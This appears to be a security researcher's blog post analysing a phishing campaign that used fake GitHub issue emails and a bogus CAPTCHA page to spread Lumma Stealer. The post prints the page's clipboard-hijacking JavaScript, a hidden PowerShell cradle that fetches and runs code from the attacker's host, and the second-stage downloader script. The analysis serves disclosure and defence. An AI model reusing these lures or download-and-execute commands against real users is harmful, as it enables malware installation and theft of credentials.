Lumma Stealer campaign attacks developers on GitHub

It appears that threat actors have been abusing GitHub’s “issues” functionality to mass-send emails to repository owners in order to spread samples of Lumma information stealer.

I have been personally a victim of this attempt, and this post is about sharing how the campaign delivered the message and what I’ve found.

The Email

I received the following email on Sep 19, 2024, 12:12 AM (GMT+2):

captionless image

The email has been sent by the threat actor by creating an “Issue” instance on (my) GitHub repository using their arbitrary “_hcheBlseacampbgell_” account. The issue was then deleted right after, once the email was received by me.

It is possible to observe this from the following picture:

https://web.archive.org/web/20240918175623/https://github.com/DataDog/security-labs-pocs/issues/18 (credits to them for this snapshot)

The malicious website

The github-scanner[.]com link initially presents no arguments and seems to point to its domain only. Upon visiting the page, a curious CAPTCHA is prompted:

captionless image

Anybody accustomed to CAPTCHAs will know that this one looks very suspicious. By analyzing the page’s source-code, these lines of JavaScript code are present:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<script>
const verifyButton = document.getElementById('verifyButton');
const modalBg = document.getElementById('modalBg');
verifyButton.addEventListener('click', function() {
modalBg.style.display = 'flex';
const captchaText = "powershell.exe -w hidden -Command \"iex
(iwr 'https://github-scanner.com/download.txt').Content\" # \"✅ ''I am
not a robot - reCAPTCHA Verification ID: 93752\"";
const tmpTxtArea = document.createElement("textarea");
tmpTxtArea.value = captchaText;
document.body.appendChild(tmpTxtArea);
tmpTxtArea.select();
document.execCommand("copy");
document.body.removeChild(tmpTxtArea);
});
</script>

The script above is used to copy a specific text in the visitor’s clipboard once the “_I’m not a robot_” button is pressed.
In this case, the text that will be copied to our clipboard is a malicious powershell download cradle that automatically executes a script present in the attacker’s web server. We will analyze the script later.

Out of curiosity, let’s actually play along and press the “_I’m not a robot_” button to see what the website displays.

captionless image

Interesting… the website prompts us to execute those steps to complete the verification steps; meanwhile, the short powershell command is written to our clipboard:

1
powershell.exe -w hidden -Command "iex (iwr 'https://github-scanner.com/download.txt').Content" # "✅ ''I am not a robot - reCAPTCHA Verification ID: 93752"

Executing the malicious script

By “verifying” that we are humans, we are running a malicious powershell script that performs the following actions automatically:

1
2
3
4
5
6
7
# Start a powershell terminal in a hidden context.
powershell.exe -w hidden
# Execute a command
-Command "..."
# Download the script present in the link and execute its code
# through the Invoke-Expression cmdlet (iex).
iex (iwr 'https://github-scanner.com/download.txt').Content

The script to execute is fetched from the attacker’s webserver at the github-scanner[.]com/download.txt location. Let’s view the script’s contents with a few comments to understand what the malicious code does.

1
2
3
4
5
6
7
8
9
10
# Create a WebClient class instance (common method to perform web requests)
$webClient = New-Object System.Net.WebClient
# Define the request's target URL. The script wants to download an executable.
$url1 = "https://github-scanner.com/l6E.exe"
# Define where to write the executable (%temp% directory)
$filePath1 = "$env:TEMP\SysSetup.exe"
# Download the executable and save it in the defined path (%temp%)
$webClient.DownloadFile($url1, $filePath1)
# Run the executable.
Start-Process -FilePath $env:TEMP\SysSetup.exe

Very simple, yet very effective.

In my experience, at the time of testing, the downloaded executable did not trigger Windows Defender’s signature detection, but would have most likely been stopped by behavioral analysis.

The downloaded 345.87 KB executable is a known .NET malware sample named Lumma Stealer, an infamous information stealer sold to cyber-criminals as a MaaS (Malware-as-a-Service) on Russian markets for roughly 250$/mo.

The sample can be downloaded here, for research purposes. Furthermore, whoever is interested in a deeper inspection of the malware sample, here is a sandbox analysis of the sample through the ANY.RUN platform.

The current situation

At the time of writing, roughly 18 hours after receiving the initial email, the malware is detected by 50 antivirus engines as shown on the VirusTotal entry for the associated executable.

captionless image